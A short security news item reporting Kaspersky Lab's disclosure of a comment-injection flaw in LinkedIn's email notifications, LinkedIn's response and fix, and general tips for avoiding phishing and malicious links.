Social platforms are a big target for hackers. A business-oriented social platform that gives details of millions of business men and women, along with their titles, colleagues, career information and more, could be extremely vulnerable to hackers, says a blogpost by Kaspersky Lab.
According to the blogpost, it is not difficult to target a user, and exploiting that information is just a single comment away. Injecting a malicious comment into a user’s post thread will automatically launch a notification to his email account, regardless of the email provider or connection hierarchy between the victim and the attacker.
“Although it seems that the application server had escaped the dangerous characters, the payload is only escaped from the main application.”
Another scenario might involve using an associated HTML form to collect information about the victim or redirect the victim to a site where a malicious executable can be downloaded.
Last year, security researchers from Kaspersky Lab warned LinkedIn, the world’s largest business-oriented social network, about a security issue that could pose a major threat to its 360+ million users. Because LinkedIn attracts so many people in the business community, a security flaw could help attackers to efficiently execute spear phishing campaigns, steal credentials and potentially gain remote control over selected victims without needing to resort to social engineering.
Linkedin engaged to remediate the threat and had since issued a fix to the vulnerable platform. “While certain HTML content should be restricted and we have issued a fix and thanked Kaspersky researchers; the likelihood of exploit on popular modern email platforms is unlikely.” says David Cintz, Senior Technical Program Manager at Linkedin security ecosystem.
Some tips to prevent yourself from becoming a victim:
* Use an advanced Internet Security solution to filter out dangerous redirections to servers that contain malware, phishing and more. If a solution is already installed, keep it updated at all times.
* Opening an attachment or following a link in an email – even from a known party – might contain malicious content. Be very wary before making the decision to open it.
* Do not register to social platforms with your corporate email account.